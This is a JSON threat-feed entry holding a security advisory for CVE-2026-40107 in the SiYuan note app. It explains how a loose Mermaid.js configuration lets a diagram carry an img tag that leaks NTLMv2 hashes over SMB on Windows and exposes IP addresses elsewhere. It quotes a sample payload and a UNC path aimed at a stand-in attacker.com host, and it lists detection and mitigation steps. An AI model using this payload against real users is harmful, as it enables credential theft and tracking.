{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/mermaid/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[{"id":"CVE-2026-40107"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["siyuan","ntlm","ssrf","credential-theft","mermaid"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eSiYuan, a note-taking application, is vulnerable to a zero-click NTLM hash theft and blind SSRF exploit due to insecure configuration of Mermaid.js. The application configures Mermaid.js with \u003ccode\u003esecurityLevel: \u0026quot;loose\u0026quot;\u003c/code\u003e and \u003ccode\u003ehtmlLabels: true\u003c/code\u003e, which allows \u003ccode\u003e\u0026lt;img\u0026gt;\u003c/code\u003e tags with \u003ccode\u003esrc\u003c/code\u003e attributes to bypass sanitization and be injected into SVG \u003ccode\u003e\u0026lt;foreignObject\u0026gt;\u003c/code\u003e blocks. When a user opens a note containing a malicious Mermaid diagram with a protocol-relative URL (e.g., \u003ccode\u003e//attacker.com/image.png\u003c/code\u003e), the Electron client fetches the URL. On Windows, this resolves as a UNC path, triggering SMB authentication and sending the victim\u0026rsquo;s NTLMv2 hash to the attacker. On macOS and Linux, the same diagram triggers an HTTP request to the attacker\u0026rsquo;s server, exfiltrating the victim\u0026rsquo;s IP address. The vulnerability affects SiYuan versions prior to the fix implemented after April 7, 2026. 
This allows for credential theft without any user interaction beyond opening a note.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker crafts a malicious SiYuan note containing a Mermaid diagram with a protocol-relative URL within an \u003ccode\u003e\u0026lt;img\u0026gt;\u003c/code\u003e tag, such as \u003ccode\u003e\u0026lt;img src='//attacker.com/share/img.png'\u0026gt;\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker distributes the malicious note (e.g., via sharing or a crafted .sy export).\u003c/li\u003e\n\u003cli\u003eThe victim opens the note in SiYuan.\u003c/li\u003e\n\u003cli\u003eSiYuan renders the Mermaid diagram using the insecure Mermaid.js configuration.\u003c/li\u003e\n\u003cli\u003eThe SVG containing the malicious \u003ccode\u003e\u0026lt;img\u0026gt;\u003c/code\u003e tag is injected into the DOM via \u003ccode\u003einnerHTML\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe Electron client attempts to fetch the resource at the protocol-relative URL.\u003c/li\u003e\n\u003cli\u003eOn Windows, the protocol-relative URL resolves to a UNC path (\u003ccode\u003e\\\\attacker.com\\share\\img.png\u003c/code\u003e), initiating an SMB connection.\u003c/li\u003e\n\u003cli\u003eOn Windows, the victim\u0026rsquo;s NTLMv2 hash is sent automatically to the attacker\u0026rsquo;s SMB server; on other platforms, the client makes an HTTP request that leaks the victim\u0026rsquo;s IP address.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe vulnerability allows for zero-click NTLMv2 hash theft on Windows systems, where the victim only needs to open a note containing the malicious Mermaid diagram. The stolen NTLMv2 hashes can be cracked offline or used in relay attacks to gain unauthorized access to the victim\u0026rsquo;s resources. 
On all platforms, this vulnerability can be exploited to perform blind SSRF and leak the victim\u0026rsquo;s IP address, acting as a tracking pixel to confirm when the note was opened. This affects all SiYuan users who receive a crafted note.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect SiYuan Mermaid NTLM Theft Attempt\u003c/code\u003e to identify SMB traffic originating from SiYuan processes attempting to connect to external IPs (network_connection log source).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect SiYuan Mermaid SSRF Attempt\u003c/code\u003e to detect HTTP requests from SiYuan to external IP addresses with a suspicious URL (network_connection log source).\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for SMB connections originating from SiYuan, especially to unusual or external destinations (network_connection log source).\u003c/li\u003e\n\u003cli\u003eBlock the attacker\u0026rsquo;s domain (\u003ccode\u003eattacker.com\u003c/code\u003e) at the DNS resolver, as observed in the malicious Mermaid diagram example (iocs).\u003c/li\u003e\n\u003cli\u003eUpgrade SiYuan to a patched version that addresses CVE-2026-40107 to mitigate the underlying vulnerability.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-11T12:00:00Z","date_published":"2026-04-11T12:00:00Z","id":"/briefs/2026-04-siyuan-ntlm-ssrf/","summary":"SiYuan is vulnerable to zero-click NTLM hash theft on Windows and blind SSRF on all platforms due to insecure Mermaid.js configuration, where a malicious Mermaid diagram containing a protocol-relative URL can be injected into a note, causing the Electron client to fetch the URL, triggering SMB authentication on Windows and sending the victim's NTLMv2 hash to the attacker. 
On macOS and Linux, the request acts as a tracking pixel and blind SSRF.","title":"SiYuan Zero-Click NTLM Theft and Blind SSRF via Mermaid Diagrams","url":"https://feed.craftedsignal.io/briefs/2026-04-siyuan-ntlm-ssrf/"}],"language":"en","title":"CraftedSignal Threat Feed — Mermaid","version":"https://jsonfeed.org/version/1.1"}